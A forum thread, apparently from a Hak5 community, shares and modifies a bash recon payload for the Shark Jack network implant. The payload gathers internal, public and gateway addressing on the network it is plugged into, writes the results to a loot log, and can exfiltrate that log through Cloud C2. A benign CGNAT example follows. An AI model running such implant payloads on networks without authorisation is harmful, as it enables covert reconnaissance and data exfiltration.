Darren Kitchen
Posted October 24, 2019

This payload gathers internal and external IP address info, including default gateway, saving the log to the loot directory and optionally exfiltrating the log to Cloud C2 if CLOUDC2=1

https://github.com/hak5/sharkjack-payloads/blob/master/payloads/library/recon/ipinfo/payload.sh

flipchart
Posted April 1, 2020

Yey! Thank you @Darren Kitchen, that's about what I wanted to create today.

There is just one downside: Many of our Internet providers nowadays are using carrier-grade NAT (https://en.wikipedia.org/wiki/Carrier-grade_NAT), and to really identify the internet connection one also needs to know the source port and the exact time of a connection...

I searched for quite some time to find a service actually providing this information and included the port information in the logging. I am pretty sure that there should be some more reliable way of obtaining this information (like from an API), but currently I can't find any. Any suggestions are welcome!

```bash
#!/bin/bash
#
# Original Payload: IP Info by Hak5Darren
# Original Link: https://github.com/hak5/sharkjack-payloads/blob/master/payloads/library/recon/ipinfo/payload.sh
#
# Description: This payload gathers internal and external IP address info,
# including default gateway, saving the log to the loot directory and
# optionally exfiltrating the log to Cloud C2 if CLOUDC2=1
#
# LED SETUP (Magenta)... Setting logs and waiting for IP address from DHCP
# LED ATTACK (Yellow Blink)... Saving IP address information
# LED FAIL (Red Blink)... Failed to gather public IP address
# LED SPECIAL (Cyan Blink)... Exfiltrating log to Cloud C2
# LED FINISH (Green Fast Blink to Solid)... Payload successful

CLOUDC2=0
LOOT_DIR=/root/loot/ipinfo
PUBLIC_IP_URL="http://ipinfo.io/ip"

function FAIL() { LED FAIL; exit; }
LED SETUP

# Make log file
mkdir -p $LOOT_DIR
LOG_FILE="ipinfo_$(find $LOOT_DIR -type f | wc -l).log"
LOG="$LOOT_DIR/$LOG_FILE"

# Ask for IP address
NETMODE DHCP_CLIENT
# Wait until Shark Jack has an IP address
while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done

LED ATTACK
# Gather IP info and save log
INTERNALIP=$(ifconfig eth0 | grep "inet addr" | awk {'print $2'} | awk -F: {'print $2'})
GATEWAY=$(route | grep default | awk {'print $2'})
PUBLICIP=$(wget --timeout=30 $PUBLIC_IP_URL -qO -) || FAIL
PUBLICPORT=$(wget --timeout=30 http://www.dnstools.ch/wie-ist-meine-ip.html -qO - | grep 'Remote Port' | egrep -o '[[:digit:]]{2,5}')
echo -e "Date: $(date)\n\
Internal IP Address: $INTERNALIP\n\
Public IP Address: $PUBLICIP\n\
Public Port Number: $PUBLICPORT\n\
Gateway: $GATEWAY\n" >> $LOG

# Optionally connect to Cloud C2, wait for connection and exfiltrate loot
if [ "$CLOUDC2" = "1" ]; then
    LED SPECIAL
    C2CONNECT
    while ! pgrep cc-client; do sleep 1; done
    C2EXFIL STRING $LOG IPinfo
fi

LED FINISH
```

PS: I couldn't find the bash highlighting...
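
The carrier-grade NAT point in the post above, as an added example that is not part of either poster's payload: behind CGNAT one public IP is shared by several subscribers, so a log entry only resolves to one of them when it also carries the source port and the time. The translation-log layout, addresses and the function names `cgnat_lookup` and `cgnat_candidates` are constructed for illustration.

```shell
#!/bin/bash
# Constructed CGNAT translation log (sample data, not from a real provider).
# Columns: start_epoch end_epoch public_ip port_first port_last subscriber_ip
CGNAT_LOG='1585730000 1585733600 198.51.100.7 1024 2047 100.64.0.11
1585730000 1585733600 198.51.100.7 2048 3071 100.64.0.12
1585733601 1585737200 198.51.100.7 1024 2047 100.64.0.35'

# Print the subscriber that held public_ip:port at the given epoch time.
# Usage: cgnat_lookup <public_ip> <port> <epoch>
cgnat_lookup() {
    printf '%s\n' "$CGNAT_LOG" | awk -v ip="$1" -v port="$2" -v t="$3" '
        $3 == ip && port >= $4 && port <= $5 && t >= $1 && t <= $2 { print $6 }'
}

# Print every subscriber that ever used public_ip: all that an
# IP-only log entry can narrow the connection down to.
# Usage: cgnat_candidates <public_ip>
cgnat_candidates() {
    printf '%s\n' "$CGNAT_LOG" | awk -v ip="$1" '$3 == ip { print $6 }' | sort -u
}

# IP alone: three possible subscribers.
cgnat_candidates 198.51.100.7
# IP + port + time: exactly one.
cgnat_lookup 198.51.100.7 2100 1585731000
# Same IP and port one hour later: the port block has been reassigned.
cgnat_lookup 198.51.100.7 1500 1585734000
```
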